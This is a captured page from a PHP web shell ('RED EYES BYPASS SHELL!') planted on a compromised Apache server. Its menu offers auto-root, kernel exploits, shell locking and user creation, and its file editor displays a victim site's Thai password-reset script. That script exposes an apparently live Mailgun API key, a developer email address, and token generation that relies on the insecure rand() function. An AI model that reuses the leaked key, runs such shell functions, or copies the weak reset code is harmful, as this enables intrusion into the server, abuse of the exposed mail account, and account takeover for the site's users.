Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
lifelonglearn /
work_181165 /
API /
reset /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
Mailserver.php
4.66
KB
-rwxr-xr-x
server.php
3.11
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Mailserver.php
<?php require '../../vendor/autoload.php'; use Mailgun\Mailgun; require_once("../../server/server.php"); if ($_SERVER["REQUEST_METHOD"] == "POST") { try { $data = json_decode(file_get_contents("php://input"), true); if ($data !== "") { // $query = $db->query("TRUNCATE TABLE resetKey"); $email = base64_decode($data["email"]); $ip = $data["ip"]; $stmp = $db->prepare("SELECT * FROM user WHERE email LIKE BINARY :email"); $stmp->bindValue(":email", $email, PDO::PARAM_STR); if ($stmp->execute()) { $row = $stmp->rowCount(); $data = $stmp->fetch(PDO::FETCH_ASSOC); if ($row == 0) { http_response_code(405); echo json_encode(array("status" => false, "message" => "ไม่พบบัญชีนี้ กรุณาลองใหม่!!")); exit; } else { $id = $data["ID"]; $characters = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'; $charactersLength = strlen($characters); $token = ''; for ($i = 0; $i < 25; $i++) { $token .= $characters[rand(0, $charactersLength - 1)]; } $tokenHash = password_hash($token, PASSWORD_DEFAULT); $date = date("Y-m-d H:i"); $limit = date('Y-m-d H:i', strtotime('+5 minutes')); $query = $db->prepare("INSERT INTO resetKey (AuthToken,userID,date,send,ip) values (:auth,:id,:date,:send,:ip)"); $query->bindValue(':auth', $tokenHash, PDO::PARAM_STR); $query->bindValue(':id', $id, PDO::PARAM_STR); $query->bindValue(':date', $limit, PDO::PARAM_STR); $query->bindValue(':send', $date, PDO::PARAM_STR); $query->bindValue(':ip', $ip, PDO::PARAM_STR); if ($query->execute()) { $idver = $db->lastInsertId(); $url = "http://dwr8riew.com/work_181165/reset?AuthToken=" . $token . "&id=" . $idver; $html = new DOMDocument(); $html->loadHTMLFile('../../template/reset.html'); $html->getElementById('email-text')->nodeValue = $email; $html->getElementById('time')->nodeValue = $date; $html->getElementById('Code-Text')->setAttribute('href', $url); $html->getElementById('Code-Text')->textContent = $url; $html->saveHTMLFile('../../template/reset.html'); $html = file_get_contents("../../template/reset.html"); $mg = Mailgun::create('f3fba5ad4aaf7626f659be4ec87a8a77-523596d9-2ea1195d'); $domain = "sandboxe8e1332c3df3415ebaeb89547b942510.mailgun.org"; $option = [ 'from' => "dwr8riew.com < rachatapon.dev@gmail.com >", 'to' => $email, 'subject' => 'Reset Password', 'html' => $html ]; if ($mg->messages()->send($domain, $option)) { http_response_code(200); echo json_encode(array("status" => true, "message" => "success")); exit; } else { http_response_code(405); echo json_encode(array("status" => false, "message" => "Failed to send Mail!!")); exit; } } else { http_response_code(405); echo json_encode(array("status" => false, "message" => "Server sql Error!!")); exit; } } } else { http_response_code(405); echo json_encode(array("status" => false, "message" => "Server sql Error!!")); exit; } } else { http_response_code(405); echo json_encode(array("status" => false, "message" => "Data required!!")); exit; } } catch (Exception $e) { http_response_code(405); echo json_encode(array("status" => false, "message" => $e->getMessage())); exit; } } else { http_response_code(405); echo json_encode(array("status" => false, "message" => "Request method Not accept!!")); exit; }
Close